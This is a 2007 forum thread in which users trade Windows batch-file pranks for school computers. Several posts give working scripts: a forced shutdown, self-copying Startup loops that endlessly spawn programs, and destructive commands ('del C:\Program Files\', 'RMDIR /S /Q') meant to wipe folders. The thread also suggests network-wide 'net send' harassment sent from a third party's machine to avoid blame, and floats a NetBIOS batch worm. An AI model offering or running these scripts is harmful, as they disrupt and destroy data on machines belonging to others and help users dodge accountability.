06-09-2007, 11:05 PM
asdf

SKy Scripter
06-09-2007, 11:33 PM
@Echo off
Shutdown -r
Save it as a .bat File :p

Just Go To START>> RUN >>
type in CMD then a black window will appear type in "shutdown" it will tell about it...

ironlarreh
06-10-2007, 02:46 AM
asdf

freyyr
07-03-2007, 03:46 AM
Any command that can be executed from the shell can be executed in a batch file. Your best bet would be to page through a DOS command reference.

Here
07-03-2007, 03:52 AM
Naw, cmon, senior pranks have to do like 'net send' to the whole network, not just shut everything down.

SKy Scripter
07-03-2007, 04:54 AM
Naw, cmon, senior pranks have to do like 'net send' to the whole network, not just shut everything down.

yeah lol, at
School i was doing "net send * Cody is Gay!!!!"
people are like WTF?
i love that... :p

freyyr
07-03-2007, 05:06 AM
Don't forget printing random garbage (the whole text of War and Peace, the Manifesto of the Communist Party, the entire US legal code, and don't forget WWII propaganda).

Also, as the windows shell supports conditional statements, one might be able to write a worm as a batch file utilizing NetBIOS vulnerabilities.

Here
07-03-2007, 05:12 AM
True. Infinite loop the net send message.

A worm? Eh, safer not to, they don't want to do anything destructive, methinks.

robertdoleliveson
07-15-2007, 02:51 PM
I do know this one little trick, put this in a text file and save as virus.bat (don't be scared by the name, it's to make THEM panic, not you lol.)
-----
@echo off
echo hahah lol you're boned now aintcha!
start virus.bat
-----

The @echo off stops the program form repeating the directory of where the program is running from, thus making it harder to find.
The echo haha...etc is a...personal touch....lol.
the last line starts the program again, making a loop.

Put this in /Start/All Programs/Startup (Just drag it and let it go.)
Restart the pc and walk away. Quickly.:D

GoF
07-16-2007, 10:40 AM
Or just..

@ECHO Off
copy %0 PATHOFSTARTUP\thenameofthefile.bat
title uberlewtviruszomg
:tehviruz
ECHO z0m9 73h 1337 b47ch v1ruzzzzz!!!!!!
start Notepad.exe
start MSPaint.exe
start Firefox.exe
start %0
GoTo tehviruz

EDIT: Decided to explain more :P

The @ECHO Off part was already explained in the above post..

The ":tehviruz" part starts the loop we've made there and to repeat it we use "GoTo tehviruz" so it goes to the start of ":tehviruz".. And then we just put everything we want to be done between ":tehviruz" and "GoTo tehviruz"...

ECHO just writes text to the command prompt..

The copy part should copy the virus to the start up. The copying part is not in the loop so it'll copy the file only once.. and of course, copy the path of startup to "PATHOFSTARTUP" part and change "thenameofthefile" part to the name of your "virus"..

Title should be easy to understand too.. Just sets the title to "uberlewtviruszomg" (without the "" of course).. Just change it to the title you want.

The "start" command part should be easy to understand too.. Just starts the program chosen.. Note that you may need to add the path of the program too.. And "start %0" starts the batch file itself.. Remove "Start firefox.exe" if the computer doesn't have firefox..

So this thing copies itself to start up and starts opening shitload of programs and the "virus" itself too so it'll open more programs.. Simple, stupid and batch :) And ofc this was only for learning purposes (incase someone would care about a simple and lame batch virus).

Oh, and I'll have to add..

del C:\Program Files\

That should be quite self explanitory(sp :p)... Just deletes the file/folder in the path you set.. Can be quite destructive :p That'll delete program files folder, INCASE it's at C drive.. Change incase different path if you want to use this.

Pyro
07-19-2007, 11:23 PM
Also depending which version of windows i.e 98 and below (if anyone still uses that anymore) deltree is possible on the windows folder. Ahaha at my university that i go to all computers are networked together. Its like a netsend war for a four hour class.

Also depending on whether you are networked to them or not or you are just sending the batch over msn. Then telnet is best :p love that thing. Damn the amount of times i got screwed over by that.

Jason2gs
07-20-2007, 09:06 PM
Also depending which version of windows i.e 98 and below (if anyone still uses that anymore) deltree is possible on the windows folder..

At least on Windows XP, it's this:

RMDIR /S /Q "Folder Tree Here"

/S = Removes all directories and files in the specified directory
in addition to the directory itself. Used to remove a directory
tree.

/Q = Quiet mode, do not ask if ok to remove a directory tree with /S

But yeah. Pretty destructive :)

ironlarreh
08-21-2007, 04:14 AM
asdf

n3ss3s
08-26-2007, 04:54 PM
Use cmd first to send a batch file to someone, which then sends to the teachers computer "Mrs. Teacher is a bitch!".

This ways, the computer number wont be yours, but the one you sent bat to, even you actually are the one who sends it..

kelly slater pro surfer
08-28-2007, 01:56 AM
whats batch?

ironlarreh
08-29-2007, 12:32 AM
asdf